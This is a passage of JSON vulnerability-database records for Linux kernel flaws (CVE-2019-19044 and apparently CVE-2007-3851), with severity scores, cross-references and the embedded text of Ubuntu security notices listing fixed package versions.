            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-151451",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19044",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-19044",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1064",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-151451",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151451"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19044"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Two memory leaks in the v3d_submit_cl_ioctl() function in drivers/gpu/drm/v3d/v3d_gem.c in the Linux kernel before 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering kcalloc() or v3d_job_init() failures, aka CID-29cd13cfd762. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-29cd13cfd762 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. =========================================================================\nUbuntu Security Notice USN-4225-1\nJanuary 07, 2020\n\nlinux, linux-aws, linux-azure, linux-azure-5.3, linux-gcp, linux-gcp-5.3,\nlinux-kvm, linux-oracle, linux-raspi2 vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 19.10\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A physically proximate attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-14895, CVE-2019-14901)\n\nIt was discovered that a heap-based buffer overflow existed in the Marvell\nLibertas WLAN Driver for the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-14896, CVE-2019-14897)\n\nIt was discovered that the Fujitsu ES network device driver for the Linux\nkernel did not properly check for errors in some situations, leading to a\nNULL pointer dereference. A local attacker could use this to cause a denial\nof service. (CVE-2019-16231)\n\nAnthony Steinhauser discovered that the Linux kernel did not properly\nperform Spectre_RSB mitigations to all processors for PowerPC architecture\nsystems in some situations. A local attacker could use this to expose\nsensitive information. (CVE-2019-18660)\n\nIt was discovered that the Broadcom V3D DRI driver in the Linux kernel did\nnot properly deallocate memory in certain error conditions. (CVE-2019-19044)\n\nIt was discovered that the Mellanox Technologies Innova driver in the Linux\nkernel did not properly deallocate memory in certain failure conditions. (CVE-2019-19045)\n\nIt was discovered that the Mellanox Technologies ConnectX driver in the\nLinux kernel did not properly deallocate memory in certain failure\nconditions. (CVE-2019-19047)\n\nIt was discovered that the Intel WiMAX 2400 driver in the Linux kernel did\nnot properly deallocate memory in certain situations. \n(CVE-2019-19051)\n\nIt was discovered that Geschwister Schneider USB CAN interface driver in\nthe Linux kernel did not properly deallocate memory in certain failure\nconditions. (CVE-2019-19052)\n\nIt was discovered that the netlink-based 802.11 configuration interface in\nthe Linux kernel did not deallocate memory in certain error conditions. (CVE-2019-19055)\n\nIt was discovered that the event tracing subsystem of the Linux kernel did\nnot properly deallocate memory in certain error conditions. A\nphysically proximate attacker could possibly use this to cause a denial of\nservice (system crash) or execute arbitrary code. (CVE-2019-19524)\n\nIt was discovered that the Microchip CAN BUS Analyzer driver in the Linux\nkernel contained a use-after-free vulnerability on device disconnect. A\nphysically proximate attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-19529)\n\nIt was discovered that the PEAK-System Technik USB driver in the Linux\nkernel did not properly sanitize memory before sending it to the device. A\nphysically proximate attacker could use this to expose sensitive\ninformation (kernel memory). A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-19807)\n\nIt was discovered that the DesignWare USB3 controller driver in the Linux\nkernel did not properly deallocate memory in some error conditions. (CVE-2019-18813)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 19.10:\n  linux-image-5.3.0-1008-oracle   5.3.0-1008.9\n  linux-image-5.3.0-1009-aws      5.3.0-1009.10\n  linux-image-5.3.0-1009-azure    5.3.0-1009.10\n  linux-image-5.3.0-1009-kvm      5.3.0-1009.10\n  linux-image-5.3.0-1011-gcp      5.3.0-1011.12\n  linux-image-5.3.0-1015-raspi2   5.3.0-1015.17\n  linux-image-5.3.0-26-generic    5.3.0-26.28\n  linux-image-5.3.0-26-generic-lpae  5.3.0-26.28\n  linux-image-5.3.0-26-lowlatency  5.3.0-26.28\n  linux-image-5.3.0-26-snapdragon  5.3.0-26.28\n  linux-image-aws                 5.3.0.1009.11\n  linux-image-azure               5.3.0.1009.27\n  linux-image-gcp                 5.3.0.1011.12\n  linux-image-generic             5.3.0.26.30\n  linux-image-generic-lpae        5.3.0.26.30\n  linux-image-gke                 5.3.0.1011.12\n  linux-image-kvm                 5.3.0.1009.11\n  linux-image-lowlatency          5.3.0.26.30\n  linux-image-oracle              5.3.0.1008.9\n  linux-image-raspi2              5.3.0.1015.12\n  linux-image-snapdragon          5.3.0.26.30\n  linux-image-virtual             5.3.0.26.30\n\nUbuntu 18.04 LTS:\n  linux-image-5.3.0-1009-azure    5.3.0-1009.10~18.04.1\n  linux-image-5.3.0-1010-gcp      5.3.0-1010.11~18.04.1\n  linux-image-azure-edge          5.3.0.1009.9\n  linux-image-gcp-edge            5.3.0.1010.10\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4225-1\n  CVE-2019-14895, CVE-2019-14896, CVE-2019-14897, CVE-2019-14901,\n  CVE-2019-16231, CVE-2019-18660, CVE-2019-18813, CVE-2019-19044,\n  CVE-2019-19045, CVE-2019-19047, CVE-2019-19051, CVE-2019-19052,\n  CVE-2019-19055, CVE-2019-19072, CVE-2019-19524, CVE-2019-19529,\n  CVE-2019-19534, CVE-2019-19807\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/5.3.0-26.28\n  https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1009.10\n  https://launchpad.net/ubuntu/+source/linux-azure/5.3.0-1009.10\n  https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1011.12\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1009.10\n  https://launchpad.net/ubuntu/+source/linux-oracle/5.3.0-1008.9\n  https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1015.17\n  https://launchpad.net/ubuntu/+source/linux-azure-5.3/5.3.0-1009.10~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-gcp-5.3/5.3.0-1010.11~18.04.1\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19044"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "db": "VULHUB",
        "id": "VHN-151451"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-19044",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155853",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0052",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-151451",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151451"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19044"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ]
  },
  "id": "VAR-201911-1397",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151451"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:51:37.141000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-5.3.11",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.3.11"
      },
      {
        "title": "drm/v3d: Fix memory leak in v3d_submit_cl_ioctl",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/29cd13cfd7624726d9e6becbae9aa419ef35af7f"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=102986"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-401",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-400",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151451"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19044"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20191205-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.3.11"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/torvalds/linux/commit/29cd13cfd7624726d9e6becbae9aa419ef35af7f"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/4225-1/"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19044"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19044"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4228-1/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4227-1/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4226-1/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-five-vulnerabilities-via-memory-leak-30910"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0052/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155853/ubuntu-security-notice-usn-4225-1.html"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4225-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16231"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18813"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19052"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1009.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.3/5.3.0-1010.11~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.3/5.3.0-1009.10~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19047"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19045"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14895"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1009.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.3.0-26.28"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19524"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19807"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19529"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19072"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1015.17"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19534"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19055"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.3.0-1009.10"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19051"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.3.0-1008.9"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151451"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19044"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-151451"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19044"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151451"
      },
      {
        "date": "2019-11-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "date": "2020-01-07T16:46:28",
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "date": "2019-11-18T06:15:11.280000",
        "db": "NVD",
        "id": "CVE-2019-19044"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151451"
      },
      {
        "date": "2019-11-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      },
      {
        "date": "2023-01-20T14:35:42.983000",
        "db": "NVD",
        "id": "CVE-2019-19044"
      },
      {
        "date": "2020-08-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerable to resource exhaustion",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011984"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1064"
      }
    ],
    "trust": 0.6
  }
}

var-200708-0604
Vulnerability from variot

The drm/i915 component in the Linux kernel before 2.6.22.2, when used with i965G and later chipsets, allows local users with access to an X11 session and Direct Rendering Manager (DRM) to write to arbitrary memory locations and gain privileges via a crafted batchbuffer. The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers. Versions of Linux kernel prior to 2.6.22.2 are vulnerable to this issue. =========================================================== Ubuntu Security Notice USN-510-1 August 31, 2007 linux-source-2.6.20 vulnerabilities CVE-2007-2525, CVE-2007-2875, CVE-2007-2876, CVE-2007-2878, CVE-2007-3104, CVE-2007-3105, CVE-2007-3513, CVE-2007-3642, CVE-2007-3843, CVE-2007-3848, CVE-2007-3851, CVE-2007-4308 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 7.04: linux-image-2.6.20-16-386 2.6.20-16.31 linux-image-2.6.20-16-generic 2.6.20-16.31 linux-image-2.6.20-16-hppa32 2.6.20-16.31 linux-image-2.6.20-16-hppa64 2.6.20-16.31 linux-image-2.6.20-16-itanium 2.6.20-16.31 linux-image-2.6.20-16-lowlatency 2.6.20-16.31 linux-image-2.6.20-16-mckinley 2.6.20-16.31 linux-image-2.6.20-16-powerpc 2.6.20-16.31 linux-image-2.6.20-16-powerpc-smp 2.6.20-16.31 linux-image-2.6.20-16-powerpc64-smp 2.6.20-16.31 linux-image-2.6.20-16-server 2.6.20-16.31 linux-image-2.6.20-16-server-bigiron 2.6.20-16.31 linux-image-2.6.20-16-sparc64 2.6.20-16.31 linux-image-2.6.20-16-sparc64-smp 2.6.20-16.31

After a standard system upgrade you need to reboot your computer to affect the necessary changes.

Details follow:

A flaw was discovered in the PPP over Ethernet implementation. Local attackers could manipulate ioctls and cause kernel memory consumption leading to a denial of service. (CVE-2007-2525)

An integer underflow was discovered in the cpuset filesystem. If mounted, local attackers could obtain kernel memory using large file offsets while reading the tasks file. This could disclose sensitive data. (CVE-2007-2875)

Vilmos Nebehaj discovered that the SCTP netfilter code did not correctly validate certain states. A remote attacker could send a specially crafted packet causing a denial of service. (CVE-2007-2876)

Luca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit systems. A local attacker could corrupt a kernel_dirent struct and cause a denial of service. (CVE-2007-2878)

A flaw in the sysfs_readdir function allowed a local user to cause a denial of service by dereferencing a NULL pointer. (CVE-2007-3104)

A buffer overflow was discovered in the random number generator. In environments with granular assignment of root privileges, a local attacker could gain additional privileges. (CVE-2007-3105)

A flaw was discovered in the usblcd driver. A local attacker could cause large amounts of kernel memory consumption, leading to a denial of service. (CVE-2007-3513)

Zhongling Wen discovered that the h323 conntrack handler did not correctly handle certain bitfields. A remote attacker could send a specially crafted packet and cause a denial of service. (CVE-2007-3642)

A flaw was discovered in the CIFS mount security checking. Remote attackers could spoof CIFS network traffic, which could lead a client to trust the connection. (CVE-2007-3843)

It was discovered that certain setuid-root processes did not correctly reset process death signal handlers. A local user could manipulate this to send signals to processes they would not normally have access to. (CVE-2007-3848)

The Direct Rendering Manager for the i915 driver could be made to write to arbitrary memory locations. An attacker with access to a running X11 session could send a specially crafted buffer and gain root privileges. (CVE-2007-3851)

It was discovered that the aacraid SCSI driver did not correctly check permissions on certain ioctls. A local attacker could cause a denial of service or gain privileges. (CVE-2007-4308)

Updated packages for Ubuntu 7.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31.diff.gz
  Size/MD5:  1577853 d02fd4ba44af531c4eb5c8035fbe3a3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31.dsc
  Size/MD5:     2472 b5489267cd7642fc1af25f1a4fb2aa4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz
  Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.31_all.deb
  Size/MD5:  4877040 3c8035f595205bf4ac22cc20acdd6794
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.31_all.deb
  Size/MD5:    84870 94e07da627c80ce5b54db4f6eb59812b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31_all.deb
  Size/MD5: 47822126 598e49bbe0381668e0b471dcb580563f

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    24494 b980d0baa6f45bd2d9c6ea3b71491996
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   202070 30b2f790562a3b5ffc8f6baf54cf5def
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    39354 0933702198ce478aa4b1842c8b12ac8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    50910 9b7df5269dd71693804155d712008929
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   187502 faf88d2629336c2da3949e4018474771
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    34906 27ab0c4687f3982b121851f2f875e491
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   644422 46b3463556bff461e1b781c381e9ca1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   174704 9c94e0c3af584b38143b1672ae1b0b0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    76424 b53a41dd02648eacb54debe890388be5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:    57886 f2d1733f4b960c624f14589a36ec5ebb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   140014 10367ad74fa4252b5d0d080a254938d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   277466 3b3731edab4901d7234fbea7f6c7974e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:  1905414 b7a3da16e9217bae2d90fd2fbf66235c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.31_amd64.deb
  Size/MD5:   857546 37ed6063fb5c8f4dbfba9ab6dd5736da
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb
  Size/MD5:   857378 31446d9184e0346b56680b8321a20734
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.31_amd64.deb
  Size/MD5:   856618 26eae5ee867cd1c209920aad4c9e3195
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_amd64.deb
  Size/MD5:  8128538 49ac62df22c8cceeb563991baf7917c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.31_amd64.deb
  Size/MD5: 23066094 111d7dbd3fcb9c8571f7007c334b1c72
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.31_amd64.deb
  Size/MD5: 23386510 d2a8aeecf1278d8cfa9d73b9ac0920ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.31_amd64.deb
  Size/MD5: 18427438 060995fe8665a45d2338a4bdd9bb1c0d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.31_amd64.deb
  Size/MD5: 18698142 e57199fb26fc10293616c4698229fa60
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_amd64.deb
  Size/MD5:   667956 3fc892773a94ea6130e19bbd41223669
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   246420 cdf0e83f330225229d0aac8d756bebef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   144474 52363784520d5673b37c1b00d1825835
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb
  Size/MD5:   225016 2cb7db7f772480b16de5a6d03797c5b6
